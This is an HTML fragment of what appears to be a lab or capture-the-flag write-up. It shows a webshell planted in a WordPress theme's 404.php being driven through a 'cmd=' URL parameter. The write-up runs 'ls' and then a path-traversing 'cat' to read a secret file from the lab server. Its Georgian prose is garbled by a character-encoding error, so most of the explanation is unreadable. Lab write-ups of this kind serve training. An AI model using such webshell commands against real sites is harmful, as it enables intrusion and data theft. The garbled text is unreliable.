<p><strong>webshell</strong> αƒαƒª αƒ’αƒ•αƒαƒ¥αƒ•αƒ΅, αƒ›αƒαƒ΅ αƒ’αƒαƒ›αƒαƒ΅αƒαƒ§αƒ”αƒαƒ”αƒ‘αƒαƒαƒ“ αƒ΅αƒαƒ™αƒ›αƒαƒ αƒαƒ΅αƒαƒ αƒ’αƒαƒ“αƒαƒ•αƒαƒ“αƒ”αƒ— αƒαƒ› αƒ›αƒαƒ΅αƒαƒ›αƒαƒ αƒ—αƒ–αƒ”, αƒ΅αƒαƒ“αƒαƒª αƒαƒ΅αƒαƒ αƒ’αƒαƒαƒ—αƒαƒ•αƒ΅αƒ”αƒ‘αƒ£αƒαƒ αƒ“αƒ αƒαƒ αƒ’αƒ£αƒ›αƒ”αƒαƒΆαƒαƒ“ αƒ’αƒαƒ“αƒαƒ•αƒªαƒ”αƒ— <strong>cmd=</strong> αƒ“αƒ αƒ¨αƒ”αƒ›αƒ“αƒ”αƒ’ αƒαƒ΅ αƒ‘αƒ αƒ«αƒαƒαƒ”αƒ‘αƒ, αƒ αƒαƒ΅αƒ αƒ’αƒαƒ¨αƒ•αƒ”αƒ‘αƒαƒª αƒ’αƒ•αƒαƒαƒ“αƒ.</p>

<p>αƒ΅αƒαƒªαƒ“αƒ”αƒαƒαƒ“ αƒ’αƒαƒ•αƒ£αƒ¨αƒ•αƒαƒ— <strong>cmd=ls</strong></p>

<p><img src="img/1__4Ll2U1SDlBNNwsjTCocGeg.png" alt="" /></p>

<p>αƒ©αƒ•αƒ”αƒαƒ αƒ¨αƒ”αƒαƒ αƒ›αƒ£αƒ¨αƒαƒαƒ‘αƒ΅, αƒαƒ΅αƒ¦αƒ αƒ“αƒαƒ’αƒ•αƒ αƒ©αƒ”αƒαƒαƒ αƒ›αƒ”αƒαƒ αƒ” αƒ’αƒαƒ΅αƒαƒ¦αƒ”αƒ‘αƒ αƒ•αƒαƒαƒαƒ•αƒαƒ—.</p>

<p>αƒ αƒαƒ›αƒ“αƒ”αƒαƒαƒ›αƒ” αƒ“αƒαƒ αƒ”αƒ¥αƒΆαƒαƒ αƒαƒαƒ— αƒ£αƒ™αƒαƒ αƒ’αƒαƒ΅αƒ•αƒαƒαƒ΅ αƒ¨αƒ”αƒ›αƒ“αƒ”αƒ’, αƒ’αƒ•αƒ®αƒ“αƒ”αƒ‘αƒ αƒ¤αƒαƒαƒαƒ, αƒ αƒαƒ›αƒ”αƒαƒαƒª αƒ΅αƒαƒ•αƒαƒ αƒαƒ£αƒ“αƒαƒ— αƒ©αƒ•αƒ”αƒαƒ αƒ›αƒ”αƒαƒ αƒ” αƒ’αƒαƒ΅αƒαƒ¦αƒ”αƒ‘αƒαƒ.</p>

<p><img src="img/1__ky0__7QGX2woIqhAUGkZeow.png" alt="" /></p>

<p>αƒ›αƒαƒ΅ αƒ΅αƒαƒαƒαƒ®αƒαƒ•αƒαƒ“ αƒ΅αƒαƒ™αƒ›αƒαƒ αƒαƒ΅αƒαƒ <strong>ls</strong> αƒ¨αƒ”αƒ•αƒªαƒ•αƒαƒαƒαƒ— <strong>cat</strong> αƒαƒ— αƒ“αƒ αƒ›αƒαƒ΅αƒαƒ›αƒαƒ αƒ—αƒ¨αƒ αƒ“αƒαƒ•αƒαƒ›αƒαƒΆαƒαƒ— αƒ©αƒ•αƒ”αƒαƒ αƒ¤αƒαƒαƒαƒαƒ΅ αƒ΅αƒαƒ®αƒ”αƒαƒ:</p>

<p><img src="img/1__UzNPGb8BNWFOYU0qcLjHpg.png" alt="[**http://185.212.254.50/wp/wordpress/wp-content/themes/twentyseventeen/404.php?cmd=cat%20../../../../../s3cr3t_fil3_for_transactions**](http://185.212.254.50/wp/wordpress/wp-content/themes/twentyseventeen/404.php?cmd=cat%20../../../../../s3cr3t_fil3_for_transactions)" />
<a href="http://185.212.254.50/wp/wordpress/wp-content/themes/twentyseventeen/404.php?cmd=cat%20../../../../../s3cr3t_fil3_for_transactions"><strong>http://185.212.254.50/wp/wordpress/wp-content/themes/twentyseventeen/404.php?cmd=cat%20../../../../../s3cr3t_fil3_for_transactions</strong></a></p>

<p>αƒ›αƒ”αƒαƒ αƒ” αƒ’αƒαƒ΅αƒαƒ¦αƒ”αƒ‘αƒαƒª αƒ•αƒαƒαƒαƒ•αƒ”αƒ—.</p>

<p>αƒ™αƒαƒ‘αƒ”αƒ  αƒαƒαƒαƒ›αƒαƒαƒαƒ“αƒ αƒ«αƒαƒαƒαƒαƒ αƒ™αƒαƒ αƒ’αƒ αƒ΅αƒαƒ¨αƒ£αƒαƒαƒ”αƒ‘αƒαƒ αƒαƒ®αƒαƒαƒ αƒαƒαƒ¤αƒαƒ αƒ›αƒαƒªαƒαƒαƒ΅ αƒ¨αƒ”αƒ΅αƒαƒ΅αƒ¬αƒαƒ•αƒαƒαƒ“, <a href="https://cyber-lab.tech/"><strong>cyber-lab</strong></a> αƒ–αƒ” αƒ¨αƒ”αƒ’αƒαƒ«αƒαƒαƒαƒ— αƒαƒ™αƒ”αƒ—αƒαƒ— αƒ΅αƒαƒ•αƒαƒ αƒ―αƒαƒ¨αƒαƒ”αƒ‘αƒ, αƒ αƒαƒ›αƒαƒ”αƒ‘αƒαƒª αƒ’αƒαƒ’αƒαƒªαƒαƒαƒ‘αƒ”αƒ αƒ αƒ”αƒαƒαƒ£αƒ  αƒαƒαƒªαƒαƒ“αƒ”αƒαƒΆαƒ”αƒ‘αƒ΅, αƒ£αƒαƒ›αƒ αƒαƒ•αƒ αƒ•αƒαƒ αƒ“αƒαƒ αƒ”αƒ΅αƒαƒ΅ <strong>β€</strong>αƒ“αƒ”αƒ•αƒ”αƒαƒαƒαƒ”αƒ αƒ<strong>β€</strong> αƒ£αƒ¨αƒ•αƒ”αƒ‘αƒ΅ αƒ›αƒ΅αƒ’αƒαƒ•αƒ΅ αƒ¨αƒ”αƒªαƒ“αƒαƒ›αƒαƒ΅, αƒαƒ  αƒαƒαƒαƒ®αƒαƒ”αƒ‘αƒ”αƒ αƒ“αƒ αƒαƒ£αƒαƒαƒ“ αƒαƒαƒαƒ’αƒαƒαƒ”αƒ‘αƒ΅, αƒαƒ§αƒ”αƒαƒ”αƒ‘αƒ”αƒ αƒ’αƒαƒΆαƒ”αƒ®αƒαƒαƒ”αƒ‘αƒ΅ (αƒ αƒαƒ›αƒαƒ”αƒ‘αƒ¨αƒαƒª αƒ’αƒαƒ αƒαƒαƒΆαƒαƒ αƒ”αƒ‘αƒ£αƒαƒαƒ αƒ›αƒ΅αƒ’αƒαƒ•αƒ¨αƒ αƒ¨αƒ”αƒ αƒ™αƒαƒ“αƒ”αƒ‘αƒ).</p>

<p><strong>Feedback is welcomeΒ ;)</strong></p>

:ET
